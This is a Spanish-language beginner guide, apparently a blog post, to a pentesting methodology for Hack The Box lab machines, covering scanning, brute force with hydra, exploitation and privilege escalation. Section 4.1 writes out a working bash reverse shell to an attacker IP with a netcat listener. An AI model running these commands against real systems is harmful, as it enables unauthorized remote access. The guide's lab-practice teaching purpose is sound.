Hack The Box (HTB) es una plataforma popular para aprender hacking y ciberseguridad de manera práctica. Si eres principiante, es importante seguir una metodología para abordar las máquinas de forma organizada. En este artículo, te guiaré paso a paso en el proceso de pentesting en HTB.
1. Configuración Inicial
Antes de empezar, asegúrate de tener:
- Una cuenta en Hack The Box.
- Una máquina virtual con Kali Linux u otra distribución de pentesting.
- La conexión VPN de HTB configurada.
- Un documento de notas para registrar información relevante.
Conectar a la VPN de HTB
sudo openvpn archivo.ovpn
Este archivo se descarga desde la página de HTB en «Access» > «Download VPN».
2. Reconocimiento (Recon)
El primer paso en un pentesting es recopilar información sobre la máquina.
2.1. Identificar la dirección IP de la máquina
Cada máquina en HTB tiene una IP privada dentro de la VPN (ejemplo: 10.10.10.100
).
2.2. Escaneo de Puertos con Nmap
nmap -sC -sV -A -p- 10.10.10.100 -oN nmap_scan.txt
Este comando escanea todos los puertos y enumera servicios activos.
2.3. Análisis de Servicios
Según los resultados, investigamos:
- Puerto 80 (HTTP): Servidor web. Revisamos en el navegador.
- Puerto 22 (SSH): Puede permitir acceso remoto.
- Puerto 445 (SMB): Comparticiones de archivos.
Herramientas adicionales:
whatweb
,gobuster
,enum4linux
.
3. Enumeración Específica
3.1. Buscar Exploits Públicos
searchsploit servicio_o_version
O bien, buscar en Exploit-DB.
3.2. Fuerza Bruta (Si Es Necesario)
Si encontramos credenciales por defecto:
hydra -l usuario -P rockyou.txt 10.10.10.100 ssh
4. Explotación (Ganar Acceso)
Dependiendo de la información obtenida, ejecutamos ataques para obtener acceso.
4.1. Obtener una Shell Inversa
En nuestra máquina atacante:
nc -lvnp 4444
En la víctima:
bash -i >& /dev/tcp/10.10.14.2/4444 0>&1
Reemplaza
10.10.14.2
con tu IP de atacante (ip a
).
5. Escalada de Privilegios (Root)
Una vez dentro, buscamos convertirnos en root
.
5.1. Revisar Permisos del Usuario
whoami
id
sudo -l
5.2. Buscar Archivos con Permisos Inseguros
find / -perm -4000 2>/dev/null
5.3. Buscar Vulnerabilidades en el Kernel
uname -a
Podemos buscar exploits en Exploit-DB según la versión del sistema.
5.4. Revisar GTFOBins para Abusar Binarios
Si encontramos comandos ejecutables con sudo
, buscamos posibles explotaciones en GTFOBins.
6. Captura de Flags
Cada máquina en HTB tiene dos flags:
- User Flag: En
/home/user/user.txt
- Root Flag: En
/root/root.txt
Para leerlas:
cat /home/user/user.txt
cat /root/root.txt
🚨 Importante: No compartas las flags en público.
7. Documentación y Write-up
Es clave registrar los pasos seguidos en cada máquina para mejorar el aprendizaje. Si la máquina ya está retirada, puedes hacer un write-up para tu blog o GitHub (sin las flags).
Resumen de la Metodología HTB
- Configurar: Conectar a la VPN y preparar el entorno.
- Reconocimiento: Escanear con
nmap
y herramientas de enumeración. - Enumeración Específica: Buscar exploits y posibles vulnerabilidades.
- Explotación: Obtener acceso a la máquina objetivo.
- Escalada de Privilegios: Obtener acceso
root
. - Capturar Flags: User y root.
- Documentar: Guardar pasos para futuros aprendizajes.
Consejos Finales
- Empieza con máquinas fáciles y ve aumentando la dificultad.
- Practica con diferentes herramientas como Metasploit, Burp Suite y LinPEAS.
- No te rindas, prueba diferentes enfoques.
- Siempre respeta la ética hacking (White Hat).
Recuerda: La paciencia y la práctica son claves en el mundo de la ciberseguridad.
Deja una respuesta